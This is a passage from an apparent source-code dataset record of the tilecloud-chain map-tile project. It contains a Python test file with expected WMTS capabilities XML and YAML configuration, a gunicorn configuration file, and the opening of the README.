xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>no_dim</ows:Title>\n <ows:Identifier>no_dim</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/no_dim/default/\"\"\"\n \"\"\"{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>one</ows:Title>\n <ows:Identifier>one</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/one/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>two</ows:Title>\n <ows:Identifier>two</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2012</Value>\n </Dimension>\n <Dimension>\n <ows:Identifier>LEVEL</ows:Identifier>\n <Default>1</Default>\n <Value>1</Value>\n <Value>2</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/two/default/\"\"\"\n \"\"\"{DATE}/{LEVEL}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n\n def test_multi_url_capabilities(self) -> None:\n gene = TileGeneration(\"tilegeneration/test-fix.yaml\", configure_logging=False)\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, \"multi_url\"), self.MULTIHOST_CAPABILITIES, True\n )\n\n CONFIG = \"\"\"\ncaches:\n local:\n folder: /tmp/tiles\n http_url: http://wmts1/tiles/\n type: filesystem\n wmtscapabilities_file: 1.0.0/WMTSCapabilities.xml\n mbtiles:\n folder: /tmp/tiles/mbtiles\n http_url: http://wmts1/tiles/\n type: mbtiles\n multi_host:\n folder: /tmp/tiles\n hosts:\n - wmts1\n - wmts2\n - wmts3\n http_url: http://%(host)s/tiles/\n type: filesystem\n multi_url:\n folder: /tmp/tiles\n http_urls:\n - http://wmts1/tiles/\n - http://wmts2/tiles/\n - http://wmts3/tiles/\n type: filesystem\n s3:\n bucket: tiles\n cache_control: public, max-age=14400\n folder: tiles\n host: s3-eu-west-1.amazonaws.com\n http_url: https://%(host)s/%(bucket)s/%(folder)s/\n type: s3\ncost:\n cloudfront:\n download: 0.12\n get: 0.009\n request_per_layers: 10000000\n s3:\n download: 0.12\n get: 0.01\n put: 0.01\n storage: 0.125\n sqs:\n request: 0.01\ngeneration:\n default_cache: local\n default_layers:\n - line\n - polygon\n error_file: error.list\n maxconsecutive_errors: 2\n number_process: 1\ngrids:\n swissgrid_01:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 10\n resolutions:\n - 1\n - 0.2\n - 0.1\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_025:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 4\n resolutions:\n - 0.25\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_2_5:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: resolution\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 2\n resolutions:\n - 2.5\n srs: EPSG:21781\n tile_size: 256\n unit: m\n swissgrid_5:\n bbox:\n - 420000\n - 30000\n - 900000\n - 350000\n matrix_identifier: zoom\n proj4_literal: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=600000 +y_0=200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\n resolution_scale: 1\n resolutions:\n - 100\n - 50\n - 20\n - 10\n - 5\n srs: EPSG:21781\n tile_size: 256\n unit: m\nlayers:\n all:\n bbox:\n - 550000.0\n - 170000.0\n - 560000.0\n - 180000.0\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point,line,polygon\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n line:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.line\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache\n layers: line\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n params:\n PARAM: value\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n mapnik:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n output_format: png\n px_buffer: 0\n type: mapnik\n wmts_style: default\n mapnik_grid:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: json\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n layers_fields:\n line:\n - name\n point:\n - name\n polygon:\n - name\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: application/utfgrid\n output_format: grid\n px_buffer: 0\n resolution: 16\n type: mapnik\n wmts_style: default\n mapnik_grid_drop:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n data_buffer: 128\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n drop_empty_utfgrid: true\n extension: json\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n layers: __all__\n layers_fields:\n point:\n - name\n mapfile: mapfile/test.mapnik\n meta: false\n meta_buffer: 0\n meta_size: 8\n mime_type: application/utfgrid\n output_format: grid\n px_buffer: 0\n resolution: 16\n type: mapnik\n wmts_style: default\n point:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n min_resolution_seed: 10\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_hash:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n min_resolution_seed: 10\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_hash_no_meta:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n point_px_buffer:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.point\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: point\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n px_buffer: 100\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n polygon:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_5\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: polygon\n meta: false\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\n polygon2:\n cost:\n metatile_generation_time: 30\n tile_generation_time: 30\n tile_size: 20\n tileonly_generation_time: 60\n dimensions:\n - default: '2012'\n generate:\n - '2012'\n name: DATE\n values:\n - '2005'\n - '2010'\n - '2012'\n empty_metatile_detection:\n hash: 01062bb3b25dcead792d7824f9a7045f0dd92992\n size: 20743\n empty_tile_detection:\n hash: dd6cb45962bccb3ad2450ab07011ef88f766eda8\n size: 334\n extension: png\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=db\n sql: the_geom AS geom FROM tests.polygon\n grid: swissgrid_01\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n layers: polygon\n meta: true\n meta_buffer: 128\n meta_size: 8\n mime_type: image/png\n px_buffer: 0\n type: wms\n url: http://mapserver:8080/mapserv\n wmts_style: default\nmetadata:\n abstract: Some abstract\n access_constraints: None\n fees: None\n keywords:\n - some\n - keywords\n servicetype: OGC WMTS\n title: Some title\nopenlayers:\n center_x: 600000\n center_y: 200000\n zoom: 3\n srs: EPSG:21781\n proj4js_def: +proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=2600000 +y_0=1200000 +ellps=bessel\n +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\nprovider:\n contact:\n info:\n address:\n area: BE\n city: Berne\n country: Switzerland\n delivery: Address delivery\n email: [email protected]\n postal_code: 3000\n phone:\n fax: +41 11 222 33 44\n voice: +41 11 222 33 44\n name: The contact name\n position: The position name\n name: The provider name\n url: The provider URL\nsns:\n region: eu-west-1\n topic: arn:aws:sns:eu-west-1:your-account-id:tilecloud\nsqs:\n queue: sqs_point\n \"\"\"\n\n def test_config(self) -> None:\n self.assert_cmd_yaml_equals(\n cmd=\".build/venv/bin/generate_controller --dump-config -c tilegeneration/test-fix.yaml\",\n main_func=controller.main,\n expected=self.CONFIG,\n )\n\n def test_config_line(self) -> None:\n self.assert_cmd_yaml_equals(\n cmd=\".build/venv/bin/generate_controller -l line --dump-config -c tilegeneration/test-fix.yaml\",\n main_func=controller.main,\n expected=self.CONFIG,\n )\n\n def test_quote(self) -> None:\n from tilecloud_chain import quote\n\n self.assertEqual(quote(\"abc\"), \"abc\")\n self.assertEqual(quote(\"a b c\"), \"'a b c'\")\n self.assertEqual(quote(\"'a b c'\"), \"\\\"'a b c'\\\"\")\n self.assertEqual(quote('\"a b c\"'), \"'\\\"a b c\\\"'\")\n self.assertEqual(quote(\"a\\\" b' c\"), \"'a\\\" b\\\\' c'\")\n self.assertEqual(quote(\"a'bc\"), '\"a\\'bc\"')\n self.assertEqual(quote(\"a'b\\\"c\"), \"'a\\\\'b\\\"c'\")\n self.assertEqual(quote('ab\"c'), \"'ab\\\"c'\")\n self.assertEqual(quote(\"\"), \"''\")\n\n def test_legends(self) -> None:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_controler -c tilegeneration/test-legends.yaml --legends\",\n main_func=controller.main,\n directory=\"/tmp/tiles/1.0.0/\",\n tiles_pattern=\"%s/default/legend%i.png\",\n tiles=[(\"point\", 0), (\"line\", 0), (\"line\", 2), (\"polygon\", 0), (\"all\", 0), (\"all\", 2)],\n )\n\n gene = TileGeneration(\"tilegeneration/test-legends.yaml\", configure_logging=False)\n config = gene.get_config(\"tilegeneration/test-legends.yaml\")\n self.assert_result_equals(\n controller.get_wmts_capabilities(gene, config.config[\"generation\"][\"default_cache\"]),\n r\"\"\"<\\?xml version=\"1.0\" encoding=\"UTF-8\"\\?>\n<Capabilities version=\"1.0.0\"\n xmlns=\"http://www.opengis.net/wmts/1.0\"\n xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:gml=\"http://www.opengis.net/gml\"\n xsi:schemaLocation=\"http://schemas.opengis.net/wmts/1.0/wmtsGetCapabilities_response.xsd\">\n <ows:OperationsMetadata>\n <ows:Operation name=\"GetCapabilities\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/1.0.0/WMTSCapabilities.xml\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n <ows:Operation name=\"GetTile\">\n <ows:DCP>\n <ows:HTTP>\n <ows:Get xlink:href=\"http://wmts1/tiles/\">\n <ows:Constraint name=\"GetEncoding\">\n <ows:AllowedValues>\n <ows:Value>REST</ows:Value>\n </ows:AllowedValues>\n </ows:Constraint>\n </ows:Get>\n </ows:HTTP>\n </ows:DCP>\n </ows:Operation>\n </ows:OperationsMetadata>\n <!-- <ServiceMetadataURL xlink:href=\"\" /> -->\n <Contents>\n\n <Layer>\n <ows:Title>all</ows:Title>\n <ows:Identifier>all</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/all/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" minScaleDenominator=\"112938.48786[0-9]*\" />\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/all/default/legend2.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" maxScaleDenominator=\"112938.48786[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/all/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>line</ows:Title>\n <ows:Identifier>line</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/line/default/legend0.png\" \"\"\"\n r\"\"\"width=\"[0-9]*\" height=\"[0-9]*\" minScaleDenominator=\"112938.48786[0-9]*\" />\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/line/default/legend2.png\" \"\"\"\n r\"\"\"width=\"[0-9]*\" height=\"[0-9]*\" maxScaleDenominator=\"112938.48786[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/line/default/\"\"\"\n r\"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>point</ows:Title>\n <ows:Identifier>point</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/point/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/point/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n <Layer>\n <ows:Title>polygon</ows:Title>\n <ows:Identifier>polygon</ows:Identifier>\n <Style isDefault=\"true\">\n <ows:Identifier>default</ows:Identifier>\n <LegendURL format=\"image/png\" xlink:href=\"http://wmts1/tiles/1.0.0/polygon/default/legend0.png\" \"\"\"\n \"\"\"width=\"[0-9]*\" height=\"[0-9]*\" />\n </Style>\n <Format>image/png</Format>\n <Dimension>\n <ows:Identifier>DATE</ows:Identifier>\n <Default>2012</Default>\n <Value>2005</Value>\n <Value>2010</Value>\n <Value>2012</Value>\n </Dimension>\n <ResourceURL format=\"image/png\" resourceType=\"tile\"\n template=\"http://wmts1/tiles/1.0.0/polygon/default/\"\"\"\n \"\"\"{DATE}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png\" />\n <TileMatrixSetLink>\n <TileMatrixSet>swissgrid</TileMatrixSet>\n </TileMatrixSetLink>\n </Layer>\n\n\n\n <TileMatrixSet>\n <ows:Identifier>swissgrid</ows:Identifier>\n <ows:SupportedCRS>urn:ogc:def:crs:EPSG::21781</ows:SupportedCRS>\n <TileMatrix>\n <ows:Identifier>0</ows:Identifier>\n <ScaleDenominator>357142.85714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>19</MatrixWidth>\n <MatrixHeight>13</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>1</ows:Identifier>\n <ScaleDenominator>178571.42857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>38</MatrixWidth>\n <MatrixHeight>25</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>2</ows:Identifier>\n <ScaleDenominator>71428.571428[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>94</MatrixWidth>\n <MatrixHeight>63</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>3</ows:Identifier>\n <ScaleDenominator>35714.285714[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>188</MatrixWidth>\n <MatrixHeight>125</MatrixHeight>\n </TileMatrix>\n <TileMatrix>\n <ows:Identifier>4</ows:Identifier>\n <ScaleDenominator>17857.142857[0-9]*</ScaleDenominator>\n <TopLeftCorner>420000 350000</TopLeftCorner>\n <TileWidth>256</TileWidth>\n <TileHeight>256</TileHeight>\n <MatrixWidth>375</MatrixWidth>\n <MatrixHeight>250</MatrixHeight>\n </TileMatrix>\n </TileMatrixSet>\n </Contents>\n</Capabilities>\"\"\",\n True,\n )\n" }, { "alpha_fraction": 0.599930465221405, "alphanum_fraction": 0.6047966480255127, "avg_line_length": 26.663461685180664, "blob_id": "04f3c10aba9769de3126cbe9e21de1c470524396", "content_id": "6038deb1f7d1ee5e59ab827364508552e5373e7e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2877, "license_type": "permissive", "max_line_length": 95, "num_lines": 104, "path": "/gunicorn.conf.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "###\n# app configuration\n# https://docs.gunicorn.org/en/stable/settings.html\n###\n\nimport os\n\nimport gunicorn.arbiter\nimport gunicorn.workers.base\nfrom c2cwsgiutils import get_config_defaults, prometheus\nfrom prometheus_client import multiprocess\n\nbind = \":8080\"\n\nworker_class = \"gthread\"\nworkers = os.environ.get(\"GUNICORN_WORKERS\", 2)\nthreads = os.environ.get(\"GUNICORN_THREADS\", 10)\n\npreload = \"true\"\n\naccesslog = \"-\"\naccess_log_format = os.environ.get(\n \"GUNICORN_ACCESS_LOG_FORMAT\",\n '%(H)s %({Host}i)s %(m)s %(U)s?%(q)s \"%(f)s\" \"%(a)s\" %(s)s %(B)s %(D)s %(p)s',\n)\n\n###\n# logging configuration\n# https://docs.python.org/3/library/logging.config.html#logging-config-dictschema\n###\nlogconfig_dict = {\n \"version\": 1,\n \"root\": {\n \"level\": os.environ[\"OTHER_LOG_LEVEL\"],\n \"handlers\": [os.environ[\"LOG_TYPE\"]],\n },\n \"loggers\": {\n \"gunicorn.error\": {\"level\": os.environ[\"GUNICORN_LOG_LEVEL\"]},\n # \"level = INFO\" logs SQL queries.\n # \"level = DEBUG\" logs SQL queries and results.\n # \"level = WARN\" logs neither. (Recommended for production systems.)\n \"sqlalchemy.engine\": {\"level\": os.environ[\"SQL_LOG_LEVEL\"]},\n \"c2cwsgiutils\": {\"level\": os.environ[\"C2CWSGIUTILS_LOG_LEVEL\"]},\n \"tilecloud\": {\"level\": os.environ[\"TILECLOUD_LOG_LEVEL\"]},\n \"tilecloud_chain\": {\"level\": os.environ[\"TILECLOUD_CHAIN_LOG_LEVEL\"]},\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"json\": {\n \"class\": \"tilecloud_chain.JsonLogHandler\",\n \"formatter\": \"generic\",\n \"stream\": \"ext://sys.stdout\",\n },\n },\n \"formatters\": {\n \"generic\": {\n \"format\": \"%(asctime)s [%(process)d] [%(levelname)-5.5s] %(message)s\",\n \"datefmt\": \"[%Y-%m-%d %H:%M:%S %z]\",\n \"class\": \"logging.Formatter\",\n }\n },\n}\n\nraw_paste_global_conf = [\"=\".join(e) for e in get_config_defaults().items()]\n\n\ndef on_starting(server: gunicorn.arbiter.Arbiter) -> None:\n \"\"\"\n Will start the prometheus server.\n\n Called just before the master process is initialized.\n \"\"\"\n\n del server\n\n prometheus.start()\n\n\ndef post_fork(server: gunicorn.arbiter.Arbiter, worker: gunicorn.workers.base.Worker) -> None:\n \"\"\"\n Will cleanup the configuration we get from the main process.\n\n Called just after a worker has been forked.\n \"\"\"\n\n del server, worker\n\n prometheus.cleanup()\n\n\ndef child_exit(server: gunicorn.arbiter.Arbiter, worker: gunicorn.workers.base.Worker) -> None:\n \"\"\"\n Remove the metrics for the exited worker.\n\n Called just after a worker has been exited, in the master process.\n \"\"\"\n\n del server\n\n multiprocess.mark_process_dead(worker.pid) # type: ignore [no-untyped-call]\n" }, { "alpha_fraction": 0.7396676540374756, "alphanum_fraction": 0.7426502108573914, "avg_line_length": 21.786407470703125, "blob_id": "e3b8f56107b08927430ac3110da2b045fe76bf38", "content_id": "baaacbaeef10a6a11b15e686c99eaa32ef759909", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2347, "license_type": "permissive", "max_line_length": 163, "num_lines": 103, "path": "/README.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# TileCloud Chain\n\nThe goal of TileCloud Chain is to provide tools around tile generation on a chain like:\n\nSource: WMS, Mapnik.\n\nOptionally using an 